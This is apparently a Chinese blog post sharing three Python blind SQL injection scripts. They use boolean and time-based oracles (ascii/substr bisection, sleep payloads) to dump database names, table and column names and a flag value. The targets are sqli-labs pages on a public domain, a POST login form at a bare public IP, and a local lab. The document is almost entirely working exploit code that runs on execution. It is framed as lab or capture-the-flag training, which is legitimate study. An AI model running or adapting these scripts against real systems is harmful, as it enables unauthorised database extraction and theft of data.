sql注入之盲注脚本



  • 链接:https://pan.baidu.com/s/1Uw51GRmAA3BRyFSTyVh9nA
    提取码:1234
    import requests
    # Boolean-based blind injection (bisection on ascii()) to dump the database
    # name and table list of sqli-labs Less-8.  The trailing quote closes the
    # id='...' literal so the condition appended by name()/table() is parsed as
    # SQL.  Run this only against a lab you are authorised to test.
    url = "http://caichuanqi.cn/lab/sqli-labs-master/Less-8/?id=1'"
    # One keep-alive session for the few hundred probes each dump makes.
    session = requests.Session()
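    def _bisect_char(expr, pos, probe):
        """Recover the ASCII code of character ``pos`` (1-based) of the SQL
        expression ``expr`` with a boolean oracle, by binary search over 32..127.

        ``probe(payload)`` returns True when the injected condition held.  Each
        probe asks ``ascii(substr(expr,pos,1)) > mid``; the loop keeps
        ``lo <= code <= hi`` (hi starts at 128 so 127 stays reachable) and needs
        at most 7 requests per character.  Past the end of the string MySQL's
        substr() is '' and ascii('') is 0, so every probe is false and the search
        converges to the floor, 32 -- callers use that as the end-of-string
        sentinel, which means a genuine space also terminates a dump.
        """
        lo, hi = 32, 128
        while lo < hi:
            mid = (lo + hi) // 2
            if probe("and/**/ascii(substr({0},{1},1))>{2}-- -".format(expr, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        return lo

    def _dump(expr, max_len, probe):
        """Extract ``expr`` one character at a time (positions 1..max_len-1),
        printing the prefix after every character as progress feedback and
        stopping at the 32 sentinel.  Returns the recovered string."""
        out = ''
        for pos in range(1, max_len):
            code = _bisect_char(expr, pos, probe)
            if code == 32:
                break
            out += chr(code)
            print(out)
        return out

    def _http_probe(payload):
        """Default oracle: GET ``url + payload`` through the shared session and
        look for the Less-8 'true' marker in the page.  The timeout keeps one
        stalled request from hanging the whole extraction."""
        response = session.get(url + payload, timeout=10)
        return 'You are in...........' in response.text

    def name(max_len=50, probe=None):
        """Dump the current database name (``database()``).

        max_len: one past the last position tried (default 50, as the original
                 ``range(1, 50)`` loop).
        probe:   optional ``payload -> bool`` oracle; defaults to the HTTP probe.
        Returns the recovered name (also printed incrementally).
        """
        if probe is None:
            probe = _http_probe
        return _dump("database()", max_len, probe)

    def table(max_len=50, probe=None):
        """Dump the comma-separated list of table names in the current schema.

        The list comes from ``group_concat(table_name)``, so it is bounded by the
        server's group_concat_max_len and, here, by ``max_len - 1`` characters;
        raise ``max_len`` for schemas with many tables.  Parameters and return
        value are as for name().
        """
        if probe is None:
            probe = _http_probe
        return _dump(
            "(select group_concat(table_name) from information_schema.tables where table_schema=database())",
            max_len,
            probe,
        )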
    # Run both dumps in order: the database name first, then its table list.
    for step in (name, table):
        step()
  • 徐老师的脚本(#post表单页面布尔判断注入)
    import requests
    session = requests.Session()                  # boolean-based blind injection against a POST login form (see name() below)
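    def name(max_len=100, probe=None):
        """Dump the ``username`` the login query matches, via a boolean-based
        blind injection in the POST ``password`` field.

        The username is sent as ``admin\\`` -- presumably so the backslash escapes
        the closing quote of the username literal and the password value is then
        parsed as SQL (verify against the target's query).  The probe condition
        is ``Ascii(right((username),n)) > mid``: right() returns the last ``n``
        characters, so ascii() sees the n-th character *from the end* and the
        value is recovered back to front -- reverse the return value to read it.
        right() clamps ``n`` to the length of the value, so there is no
        end-of-string signal: once ``n`` exceeds the length every further position
        resolves to the first character again and the result carries trailing
        repeats of it (the original loop always ran all 100 positions).

        max_len: number of positions to extract (original: 100).
        probe:   optional ``password_value -> bool``; defaults to POSTing the
                 form and looking for 'success.jpg' in the response.
        Returns the recovered (reversed) string; also printed after each character.
        """
        def _http(password):
            params = {"password": password, "username": "admin\\"}
            print(params)
            # timeout so one stalled request cannot hang the extraction
            response = session.post("http://81.70.89.91:33013/index.php", data=params, timeout=10)
            return 'success.jpg' in response.text

        if probe is None:
            probe = _http
        found = ''
        for j in range(max_len):
            # bisection over printable ASCII; lo == hi == the character's code at exit
            lo, hi = 32, 128
            while lo < hi:
                mid = (lo + hi) // 2
                if probe("or/**/Ascii(right((username),%d))>%d#" % (j + 1, mid)):
                    lo = mid + 1
                else:
                    hi = mid
            found += chr(lo)
            print(found)
        return found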
    name()  # runs the POST-form dump immediately on import/execution
  • 蔡老师的脚本
    import requests
    import time
    import datetime
    # Time-based blind injection target (local sqli-labs Less-9); the trailing quote
    # closes the id='...' literal so the if(...,sleep(2),1) payloads below are parsed as SQL.
    url = "http://127.0.0.1/sqlilabs/Less-9/?id=1'"
    # Alternative lab level (numeric id, no closing quote needed) -- kept from the original.
    #url = "http://127.0.0.1/sqlilabs/Less-4/?id=1"
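    def get_dbname(max_len=9, probe=None):
        """Dump ``database()`` through a time-based blind injection.

        For each position a linear scan over printable ASCII (32..126) asks the
        server to ``sleep(2)`` when ``ascii(substr(database(),i,1)) = k``; a
        response that took more than one whole second is a hit.  Past the end of
        the name substr() is '' (ascii 0), which matches no ``k``, so shorter
        names simply stop growing.  The original carried two commented-out
        variants of the payload with other quote contexts (``")``) for other lab
        levels; adapt the prefix the same way if the target needs it.

        max_len: one past the last position probed (original ``range(1, 9)``,
                 i.e. at most 8 characters -- raise it for longer names).
        probe:   optional ``payload -> bool``; defaults to timing a GET of
                 ``url + payload``.
        Returns the recovered name; the prefix is printed after each hit.

        The scan breaks at the first match instead of trying the remaining
        values (up to 94 wasted requests per character in the original), which
        also stops a single network stall from appending a second character to
        the same position.
        """
        def _timed(payload):
            started = datetime.datetime.now()
            # generous timeout: a hit legitimately takes >= 2s
            requests.get(url + payload, timeout=15)
            # .seconds is the whole-second part of the delta, so a 2s sleep shows
            # up as >= 2 and a normal round trip as 0 or 1
            return (datetime.datetime.now() - started).seconds > 1

        if probe is None:
            probe = _timed
        dbname = ''
        for i in range(1, max_len):
            for k in range(32, 127):
                payload = " and if(ascii(substr(database(),{0},1))={1},sleep(2),1)--+".format(i, k)
                if probe(payload):
                    dbname += chr(k)
                    print("数据库名为->" + dbname)
                    break
        return dbname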
    get_dbname()  # step 1 of the chain: schema name (each position costs up to 95 requests)
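    def get_table(table_count=5, max_len=6, probe=None):
        """Dump the table names of the ``security`` schema (the sqli-labs
        database; the schema is hard-coded in the payload) one row at a time via
        ``... limit i,1``, each recovered by the same time-based scan as
        get_dbname().

        Defaults keep the original limits: 5 tables, positions 1..5 -- raise
        ``max_len`` for longer names.  Two defects of the original are fixed:
        positions started at 0 (MySQL substr(s,0,1) is '', so that position
        could never match and only burned 95 requests), and the
        ``if i == 0 / elif i == 1 / elif i == 3 / elif i == 4`` chain never
        recorded the third table (i == 2).  The scan breaks at the first
        matching byte instead of trying the remaining values.

        probe: optional ``payload -> bool``; defaults to timing a GET of
               ``url + payload``.
        Returns the list of names; progress is printed with the original labels.
        """
        def _timed(payload):
            started = datetime.datetime.now()
            requests.get(url + payload, timeout=15)
            return (datetime.datetime.now() - started).seconds > 1

        if probe is None:
            probe = _timed
        labels = ("第一个表为->", "第二个表为->", "第三个表为->", "第四个表为->", "第五个表为->")
        tables = []
        for i in range(table_count):
            label = labels[i] if i < len(labels) else "第%d个表为->" % (i + 1)
            tname = ''
            for j in range(1, max_len):
                for k in range(32, 127):
                    payload = "and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit %d,1),%d,1))=%d,sleep(2),1)--+" % (i, j, k)
                    if probe(payload):
                        tname += chr(k)
                        print(label + tname)
                        break
            tables.append(tname)
        return tables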
    get_table()  # step 2: table names of the 'security' schema
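    def get_column(column_count=3, max_len=9, table="flag", probe=None):
        """Dump the column names of ``table`` (default ``flag``) from
        information_schema.columns, one row at a time via ``limit i,1``, with
        the same time-based scan as get_dbname().

        The lookup filters on table_name only, not table_schema, so a
        same-named table in another schema the user can read would be listed
        first -- add ``and table_schema=database()`` to the payload if that
        bites.  ``table`` is interpolated into the payload without quoting;
        pass a plain identifier.  The scan breaks at the first matching byte
        instead of trying the remaining values (the original's only defect
        here; its trailing ``else: break`` could never fire for i in range(3)).

        column_count: rows to read (original: 3).
        max_len:      one past the last position probed (original: 8 chars).
        probe:        optional ``payload -> bool``; defaults to timing a GET.
        Returns the list of names; progress is printed with the original labels.
        """
        def _timed(payload):
            started = datetime.datetime.now()
            requests.get(url + payload, timeout=15)
            return (datetime.datetime.now() - started).seconds > 1

        if probe is None:
            probe = _timed
        labels = ("字段一为->", "字段二为->", "字段三为->")
        columns = []
        for i in range(column_count):
            label = labels[i] if i < len(labels) else "字段%d为->" % (i + 1)
            cname = ''
            for j in range(1, max_len):
                for k in range(32, 127):
                    payload = "and if(ascii(substr((select column_name from information_schema.columns where table_name='%s' limit %d,1),%d,1))=%d,sleep(2),1)--+" % (table, i, j, k)
                    if probe(payload):
                        cname += chr(k)
                        print(label + cname)
                        break
            columns.append(cname)
        return columns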
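    get_column()  # step 3: column names of table 'flag' (the original fused this call onto the next def line)

    def get_flag(max_len=30, probe=None):
        """Dump the ``flag`` column of table ``flag`` with the same time-based
        scan as get_dbname().

        ``(select flag from flag)`` is a scalar subquery, so it would raise a
        "subquery returns more than 1 row" error if the table held several
        rows; add ``limit 0,1`` to the payload in that case.  The original
        started positions at 0 (MySQL substr(s,0,1) is '', a guaranteed miss
        that cost 95 requests); positions now run 1..max_len-1, which is the
        same set the original could actually recover.  The scan breaks at the
        first matching byte instead of trying the remaining values.

        max_len: one past the last position probed (original: 29 usable chars).
        probe:   optional ``payload -> bool``; defaults to timing a GET of
                 ``url + payload``.
        Returns the recovered value; the prefix is printed after each hit.
        """
        def _timed(payload):
            started = datetime.datetime.now()
            requests.get(url + payload, timeout=15)
            return (datetime.datetime.now() - started).seconds > 1

        if probe is None:
            probe = _timed
        flag = ''
        for i in range(1, max_len):
            for k in range(32, 127):
                payload = "and if(ascii(substr((select flag from flag),%d,1))=%d,sleep(2),1)--+" % (i, k)
                if probe(payload):
                    flag += chr(k)
                    print("flag为->" + flag)
                    break
        return flag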
    get_flag()  # step 4: the flag value itself